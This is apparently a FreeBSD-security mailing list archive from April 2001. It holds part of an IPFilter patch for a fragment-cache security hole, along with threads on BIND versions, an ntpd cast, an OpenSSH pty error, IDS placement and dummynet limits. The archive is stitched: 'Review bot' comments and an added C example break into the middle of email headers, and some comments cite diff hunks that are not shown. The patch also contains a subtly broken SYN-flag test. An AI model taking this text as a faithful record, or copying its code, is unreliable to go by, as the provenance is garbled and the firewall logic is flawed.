*ipfr_fragstats __P((void)); - --- 41,48 ---- struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (offsetof(ipfr_t, ipfr_off) - \ ! offsetof(ipfr_t, ipfr_src)) extern int fr_ipfrttl; extern ipfrstat_t *ipfr_fragstats __P((void)); diff -cr ip_fil3.3.21/ip_state.c ip_fil3.3.22/ip_state.c *** ip_fil3.3.21/ip_state.c Wed Aug 9 02:00:35 2000 - --- ip_fil3.3.22/ip_state.c Fri Apr 6 22:31:07 2001 *************** *** 1,5 **** /* ! 
* Copyright (C) 1995-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1995-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.3.2.28 2000/08/08 16:00:35 darrenr Exp $"; #endif #include - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.3.2.30 2001/04/06 12:31:07 darrenr Exp $"; #endif #include *************** *** 427,433 **** #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = (is->is_dst.s_addr != ip->ip_dst.s_addr); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } - --- 427,433 ---- #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = (is->is_dst.s_addr != ip->ip_dst.s_addr); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } *************** *** 477,483 **** if (!(tcp->th_flags & TH_ACK)) { /* Pretend an ack was sent */ ack = tdata->td_end; win = 1; ! if ((tcp->th_flags == TH_SYN) && (tdata->td_maxwin == 0)) tdata->td_maxwin = 1; } else if (((tcp->th_flags & (TH_ACK|TH_RST)) == (TH_ACK|TH_RST)) && (ack == 0)) { - --- 477,484 ---- if (!(tcp->th_flags & TH_ACK)) { /* Pretend an ack was sent */ ack = tdata->td_end; win = 1; ! if ((tcp->th_flags & TH_SYN == TH_SYN) && ! (tdata->td_maxwin == 0)) tdata->td_maxwin = 1; } else if (((tcp->th_flags & (TH_ACK|TH_RST)) == (TH_ACK|TH_RST)) && (ack == 0)) { *************** *** 1021,1027 **** fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! 
if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --- 1022,1028 ---- fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --ELM986576202-7114-0_-- ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 15:19:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id EB07437B43C for ; Fri, 6 Apr 2001 15:19:49 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: named question To: security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 6 Apr 2001 17:19:46 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 04/06/2001 05:10:39 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Which is recommended: named-8.2.3-T6B (FreeBSD 4.2) or named-8.2.3-REL from ISC George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 15:21:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id A907637B42C for ; Fri, 6 Apr 2001 15:21:46 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id E400B1360C; Fri, 6 Apr 2001 18:22:16 -0400 (EDT) Date: Fri, 6 Apr 2001 18:22:16 -0400 
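Review bot: in the ip_fil3.3.22 ip_state.c hunk at 477, the new test `(tcp->th_flags & TH_SYN == TH_SYN)` does not check the SYN bit. `==` binds tighter than `&`, so it parses as `tcp->th_flags & (TH_SYN == TH_SYN)`, i.e. `tcp->th_flags & 1`. Parenthesise the mask: `((tcp->th_flags & TH_SYN) == TH_SYN)`. The old line compared `th_flags == TH_SYN` exactly, so if matching SYN combined with other flags is the intent, the comment above the test should say so.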
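Review bot: in the ip_fil3.4.17 ip_state.c hunk at 1302, the added line `} if ((pr == IPPROTO_UDP)) {` starts a fresh `if` straight after the closing brace of the preceding block, so the UDP test is evaluated even when that block has just run. `} else if (pr == IPPROTO_UDP) {` states the intent and drops the doubled parentheses. A one-line comment on why a reverse-direction packet gets fr_udpacktimeout and a forward one fr_udptimeout would also help.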
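Review bot: in the ip_frag.h struct hunk at 24 (both trees), ipfr_ttl shrinks from u_short to u_char to make room for ipfr_seen0, so any value above 255 stored in it is now silently truncated. The same header declares fr_ipfrttl as int; if the entry TTL is seeded from that tunable, clamp or range-check it at the point of assignment and note the 8-bit limit next to the field.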
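Review bot: in the ip_frag.c lookup hunk (281,299 in 3.3.22 and 292,310 in 3.4.17), the new XXX comment says the code needs to guard against retransmission of a (src,dst,id,offset-range), but the added check only skips a second offset-0 fragment, or an FI_SHORT fragment, once ipfr_seen0 is set. A later fragment with a repeated or overlapping offset still falls through to the existing atoff handling. Either track the range already covered or reword the comment to say that only the first-fragment case is closed here.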
From: Chris Faulhaber To: George.Giles@mcmail.vanderbilt.edu Cc: security@freebsd.org Subject: Re: named question Message-ID: <20010406182216.B12260@peitho.fxp.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="uQr8t48UFsdbeI+V" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Apr 06, 2001 at 05:19:46PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--uQr8t48UFsdbeI+V
Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Fri, Apr 06, 2001 at 05:19:46PM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> Which is recommended:
>
> named-8.2.3-T6B (FreeBSD 4.2) or
> named-8.2.3-REL from ISC
>

Check out ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:18.bind.asc

8.2.3-REL (for the impatient)

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

--uQr8t48UFsdbeI+V
Content-Type: application/pgp-signature Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: FreeBSD: The Power To Serve

iEYEARECAAYFAjrOQZgACgkQObaG4P6BelCssgCfSkGZ3gbCNm0kG7oY1D5sya6A
bY8AoJ+wYaKebSY6HL1/eKdRUTqTCMmY
=IOle
-----END PGP SIGNATURE-----

--uQr8t48UFsdbeI+V--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 6 15:22:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id B0A1737B422 for ; Fri, 6 Apr 2001 15:22:35 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org ([64.183.199.40]) by poontang.schulte.org 
(8.12.0.Beta5/8.12.0.Beta5) with ESMTP id f36MMWIr078907; Fri, 6 Apr 2001 17:22:32 -0500 (CDT) Message-Id: <5.0.2.1.0.20010406172021.00ac9428@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Fri, 06 Apr 2001 17:22:05 -0500 To: George.Giles@mcmail.vanderbilt.edu, security@FreeBSD.ORG 
From: Christopher Schulte Subject: Re: named question In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:19 PM 4/6/2001 -0500, George.Giles@mcmail.vanderbilt.edu wrote: >Which is recommended: > >named-8.2.3-T6B (FreeBSD 4.2) or >named-8.2.3-REL from ISC ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:18.bind.asc 8.2.3-REL is absolutely suggested. >George > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 17: 0:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from sj-msg-core-1.cisco.com (sj-msg-core-1.cisco.com [171.71.163.11]) by hub.freebsd.org (Postfix) with ESMTP id 16C1537B443 for ; Fri, 6 Apr 2001 17:00:11 -0700 (PDT) (envelope-from bmah@cisco.com) Received: from bmah-freebsd-0.cisco.com (bmah-freebsd-0.cisco.com [171.70.84.42]) by sj-msg-core-1.cisco.com (8.9.3/8.9.1) with ESMTP id RAA27357; Fri, 6 Apr 2001 17:00:15 -0700 (PDT) Received: (from bmah@localhost) by bmah-freebsd-0.cisco.com (8.11.3/8.11.1) id f3700AD10168; Fri, 6 Apr 2001 17:00:10 -0700 (PDT) (envelope-from bmah) Message-Id: <200104070000.f3700AD10168@bmah-freebsd-0.cisco.com> X-Mailer: exmh version 2.3.1 01/19/2001 with nmh-1.0.4 To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: URGENT: Serious bug in IPFilter (fwd) In-Reply-To: <200104062135.f36LZpt67966@cwsys.cwsent.com> References: <200104062135.f36LZpt67966@cwsys.cwsent.com> Comments: In-reply-to Cy Schubert - ITSD Open Systems Group message dated "Fri, 06 Apr 2001 14:35:14 -0700." 
From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_867176716P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 06 Apr 2001 17:00:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_867176716P Content-Type: text/plain; charset=us-ascii If memory serves me right, Cy Schubert - ITSD Open Systems Group wrote: > Should we be updating IP Filter in our source tree before 4.3-RELEASE? > This sounds like a serious bug. It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet AFAIK: darrenr@FreeBSD.org said: > darrenr 2001/04/06 08:52:29 PDT > Modified files: > sys/netinet ip_frag.c ip_frag.h ip_nat.c ip_nat.h > ip_state.c > Log: > fix security hole created by fragment cache > Revision Changes Path > 1.15 +26 -5 src/sys/netinet/ip_frag.c > 1.12 +5 -3 src/sys/netinet/ip_frag.h > 1.22 +5 -3 src/sys/netinet/ip_nat.c > 1.15 +2 -1 src/sys/netinet/ip_nat.h > 1.21 +3 -3 src/sys/netinet/ip_state.c Bruce. 
--==_Exmh_867176716P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.2 06/23/2000 iD8DBQE6zliK2MoxcVugUsMRArEtAJ4jgKqouX2NHuOXbHPGFZ5UkeOM7wCg2poq iWrnytrNGZJljBMIdLeHa8o= =ckzN -----END PGP SIGNATURE----- --==_Exmh_867176716P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 22:29:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id 1036A37B43C for ; Fri, 6 Apr 2001 22:29:30 -0700 (PDT) (envelope-from razor@ldc.ro) Received: (qmail 8225 invoked by uid 666); 7 Apr 2001 05:29:13 -0000 Date: Sat, 7 Apr 2001 08:29:13 +0300 
From: Alex Popa To: Garrett Wollman Cc: Brian Somers , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010407082913.A8159@ldc.ro> References: <20010406035459.A6350@nagual.pp.ru> <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060038.UAA73318@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104060038.UAA73318@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Thu, Apr 05, 2001 at 08:38:02PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Apr 05, 2001 at 08:38:02PM -0400, Garrett Wollman wrote:
> < said:
>
> > I believe the int is correct.
>
> You are mistaken. The purpose of the cast is to defeat the automatic
> promotion from `char' to `int', which causes sign-extension if `char'
> is signed. Casting to `unsigned char' prevents this from happening.

AFAIK, the casts are applied *after* the default promotions. The only solution to defeating sign extension is to *declare* unsigned char.

>
> -GAWollman
>

------------+------------------------------------------
Alex Popa, | "Artificial Intelligence is
razor@ldc.ro| no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here."

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 6 23:44:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id DD98737B422; Fri, 6 Apr 2001 23:44:20 -0700 (PDT) (envelope-from avalon@cairo.anu.edu.au) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id QAA24197; Sat, 7 Apr 2001 16:44:12 +1000 (EST) 
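Added example, not part of any message in the "ntpd patch" thread above and not code from the ntpd patch itself: it computes the int that results from a signed character value with and without the `unsigned char` cast the thread discusses, and shows what each does to a 256-entry table lookup. The table, the function names and the sample bytes are constructed for illustration.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed 256-entry table indexed by byte value; a hypothetical
 * stand-in for any per-character lookup (a ctype-style class table). */
static unsigned char high_bit_set[UCHAR_MAX + 1];

static void init_table(void)
{
    for (int i = 0; i <= UCHAR_MAX; i++)
        high_bit_set[i] = (unsigned char)(i >= 0x80);
}

/* signed char is used explicitly so the results do not depend on
 * whether plain char is signed on the build platform. */

/* Index produced by the implicit promotion alone: the value is
 * sign-extended, so bytes 0x80..0xff become -128..-1. */
static int index_promoted(signed char c)
{
    return c;
}

/* Index produced with the cast: the value is converted to unsigned char
 * (reduced modulo 256) and only then widened to int, so it is 0..255. */
static int index_cast(signed char c)
{
    return (unsigned char)c;
}

/* Bounds-checked lookup; -1 reports an index outside the table, which an
 * unchecked high_bit_set[idx] would turn into an out-of-bounds read. */
static int lookup(int idx)
{
    if (idx < 0 || idx > UCHAR_MAX)
        return -1;
    return high_bit_set[idx];
}

/* Count the bytes in buf whose computed index misses the table. */
static size_t count_bad_indexes(const signed char *buf, size_t n, int use_cast)
{
    size_t bad = 0;

    for (size_t i = 0; i < n; i++) {
        int idx = use_cast ? index_cast(buf[i]) : index_promoted(buf[i]);
        if (lookup(idx) < 0)
            bad++;
    }
    return bad;
}

/* Constructed sample input: "ntp" followed by the bytes 0xe9 and 0xff. */
static const signed char sample[] = { 'n', 't', 'p', -23, -1 };

int main(void)
{
    init_table();
    printf("promotion only: index %d, lookup %d\n",
           index_promoted(sample[3]), lookup(index_promoted(sample[3])));
    printf("with cast:      index %d, lookup %d\n",
           index_cast(sample[3]), lookup(index_cast(sample[3])));
    printf("bad indexes without cast: %zu, with cast: %zu\n",
           count_bad_indexes(sample, sizeof sample, 0),
           count_bad_indexes(sample, sizeof sample, 1));
    return 0;
}
```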
From: Darren Reed Message-Id: <200104070644.QAA24197@cairo.anu.edu.au> Subject: Re: URGENT: Serious bug in IPFilter (fwd) To: bmah@FreeBSD.ORG Date: Sat, 7 Apr 2001 16:44:12 +1000 (Australia/NSW) Cc: Cy.Schubert@uumail.gov.bc.ca (Cy Schubert - ITSD Open Systems Group), freebsd-security@FreeBSD.ORG In-Reply-To: <200104070000.f3700AD10168@bmah-freebsd-0.cisco.com> from "Bruce A. Mah" at Apr 06, 2001 05:00:10 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Bruce A. Mah, sie said: > > --==_Exmh_867176716P > Content-Type: text/plain; charset=us-ascii > > If memory serves me right, Cy Schubert - ITSD Open Systems Group wrote: > > Should we be updating IP Filter in our source tree before 4.3-RELEASE? > > This sounds like a serious bug. > > It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet > AFAIK: This has since happened with jkh's approval. Hmmm, maybe I should have mentioned that in the commit (doh!) Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 0:13:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.unila.ac.id (ns1.unila.ac.id [202.158.47.162]) by hub.freebsd.org (Postfix) with SMTP id A585D37B424 for ; Sat, 7 Apr 2001 00:13:21 -0700 (PDT) (envelope-from riki@maiser.unila.ac.id) Received: (qmail 4778 invoked from network); 7 Apr 2001 07:16:10 -0000 Received: from maiser.unila.ac.id (192.168.1.2) by ns1.unila.ac.id with SMTP; 7 Apr 2001 07:16:10 -0000 Received: from localhost (riki@localhost) by maiser.unila.ac.id (8.9.3/8.9.3) with ESMTP id OAA22182 for ; Sat, 7 Apr 2001 14:11:34 +0700 (JAVT) (envelope-from riki@maiser.unila.ac.id) Date: Sat, 7 Apr 2001 14:11:34 +0700 (JAVT) 
From: Q Yai QQ To: freebsd-security@FreeBSD.org Subject: OOT :Bandwith limiter In-Reply-To: <200104070644.QAA24197@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

hai guys,.

i heard that dummynet can help us to manage bandwidth,..
i wanna try it,.
so give me some tutorial please,..
how should i do,..
and can u give me some example command for it,..

by the way,. how about security
is dummynet has ipfw rules ??
does it will make user got a problem to access,..
and,. does it secure like Firewall??

i dunno,. so please help me guys,.

thanks a lot

>>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<<
riki@unila.ac.id
visit my homepage and sign my guestbook
http://unilanet.unila.ac.id/~qq
---------------------------------------
---------------------------------------
&
__& &__
// \\

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 7 1: 1:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 5FC9337B424 for ; Sat, 7 Apr 2001 01:01:28 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id LAA22355; Sat, 7 Apr 2001 11:55:06 +0400 (MSD) Date: Sat, 7 Apr 2001 11:55:06 +0400 
From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.49) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <133590773347.20010407115506@sandy.ru> To: Q Yai QQ Cc: freebsd-security@FreeBSD.org Subject: Re: OOT :Bandwith limiter In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Dear Q Yai QQ,

07.04.2001 11:11, you wrote: OOT :Bandwith limiter;

Q> hai guys,.
Q> i heard that dummynet can help us to manage bandwidth,..
Q> i wanna try it,.
Q> so give me some tutorial please,..

man dummynet

~/3APA3A

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 7 7: 1: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx3.port.ru (mx3.port.ru [194.67.23.37]) by hub.freebsd.org (Postfix) with ESMTP id 3D19C37B43F for ; Sat, 7 Apr 2001 07:00:56 -0700 (PDT) (envelope-from rakukin@mail.ru) Received: from f8.int ([10.0.0.76] helo=f8.mail.ru) by mx3.port.ru with esmtp (Exim 3.14 #54) id 14ltGk-0007NB-00 for security@freebsd.org; Sat, 07 Apr 2001 18:00:50 +0400 Received: from mail by f8.mail.ru with local (Exim 3.14 #54) id 14ltGj-000C45-00 for security@freebsd.org; Sat, 07 Apr 2001 18:00:50 +0400 Received: from [194.85.224.35] by koi.mail.port.ru with HTTP; Sat, 07 Apr 2001 14:00:50 +0000 (GMT) 
From: "A. Rakukin" To: security@freebsd.org Subject: openssh problem Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: 194.85.229.130 via proxy [194.85.224.35] Reply-To: "A. Rakukin" Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Message-Id: Date: Sat, 07 Apr 2001 18:00:50 +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello,

I have a problem with ssh. When I run additional sshd to port 540 (the primary sshd works perfect) it gives an error while allocating tty (it tries to allocate /dev/ttyp0, whether it is busy or not -- does not matter). What could be the problem? Error log and sshd_config follow.

Please copy your reply, I am not subscribed.

Alex

>sshd -df config
debug1: sshd version OpenSSH_2.3.0
debug1: read DSA private key done
debug1: Bind to port 540 on 0.0.0.0.
Server listening on 0.0.0.0 port 540.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from HOST.domain port 1002
Connection from ip.address.of.HOST port 1002
debug1: Client protocol version 1.5; client software version OpenSSH_2.2.0
debug1: match: OpenSSH_2.2.0 pat ^OpenSSH[-_]2\.[012]
debug1: Local version string SSH-1.99-OpenSSH_2.3.0
debug1: Sent 768 bit public key and 1024 bit host key.
debug1: Encryption type: 3des
debug1: Received session key; encryption turned on.
debug1: Installing crc compensation attack detector.
debug1: Starting up PAM with username "USER"
debug1: Attempting authentication for USER.
debug1: Trying rhosts with RSA host authentication for client user USER
debug1: Rhosts RSA authentication: canonical host HOST.domain
Rhosts with RSA host authentication accepted for USER, USER on HOST.domain.
Accepted rhosts-rsa for USER from ip.address.of.HOST port 1002 ruser USER
debug1: session_new: init
debug1: session_new: session 0
debug1: Allocating pty.
debug1: PAM setting tty to "/dev/ttyp0"
debug1: do_pam_session: euid 0, uid 0
fatal: PAM session setup failed[6]: Permission denied
debug1: Calling cleanup 0x80545d8(0x807b480)
debug1: pty_cleanup_proc: /dev/ttyp0
debug1: Calling cleanup 0x8058150(0x0)
Cannot close PAM session[6]: Permission denied
debug1: Calling cleanup 0x805e480(0x0)

Port 540
ListenAddress 0.0.0.0
HostKey /etc/ssh/ssh_host_key
HostDsaKey /etc/ssh/ssh_host_dsa_key
ServerKeyBits 768
LoginGraceTime 120
KeyRegenerationInterval 3600
PermitRootLogin no
IgnoreRhosts no
StrictModes yes
X11Forwarding yes
X11DisplayOffset 150
PrintMotd yes
KeepAlive yes
SyslogFacility DAEMON
LogLevel INFO
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
DSAAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
SkeyAuthentication no
UseLogin no
CheckMail yes
Subsystem sftp /usr/libexec/sftp-server
MaxStartups 10:30:60

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 7 7:57:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id D78B937B43F for ; Sat, 7 Apr 2001 07:57:48 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id RAA18117 for ; Sat, 7 Apr 2001 17:10:51 +0100 Message-Id: <200104071610.RAA18117@mailgate.kechara.net> Date: Sat, 07 Apr 2001 16:00:40 +0100 To: freebsd-security@freebsd.org 
From: Lee Smallbone Subject: Theory Question Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: multipart/mixed;; boundary="_OPERAB__-snRvxGpQZy4mJNr+rjvg5d" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d Content-Type: text/plain; charset="us-ascii"; Hi there, I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot be 'hacked' (externally), is this true in the real world? The setup would look a little like this. (my apologies to those of you who do not have fixed-width fonts. See attachment if they're allowed here) /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x Would the direct link to the Internal network pose a threat to the rest of the Internal Lan? Bearing in mind the IDS wouldn't have an IP address? Any input appreciated. 
-- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d Content-Disposition: attachment; filename="layout.txt" Content-Type: text/plain; name="layout.txt" /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 8:28:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 2177237B43C for ; Sat, 7 Apr 2001 08:28:32 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from cascade (cascade.veldy.net [192.168.0.1]) by veldy.net (Postfix) with SMTP id 6C961BA40; Sat, 7 Apr 2001 10:27:14 -0500 (CDT) Message-ID: <003801c0bf77$21848400$0100a8c0@cascade> 
From: "Thomas T. Veldhouse" To: "Q Yai QQ" , References: Subject: Re: OOT :Bandwith limiter Date: Sat, 7 Apr 2001 10:26:34 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Here is a simple example:

fwcmd="/sbin/ipfw"
host="10.0.0.1"
# bandwidth limiting rules
${fwcmd} add pipe 1 tcp from ${host} to any 25 via dc1 in
${fwcmd} pipe 1 config bw 20KBytes/s

This will limit outgoing mail on SMTP port 25.

Tom Veldhouse
veldy@veldy.net

----- Original Message ----- 
From: "Q Yai QQ" To: Sent: Saturday, April 07, 2001 2:11 AM Subject: OOT :Bandwith limiter

>
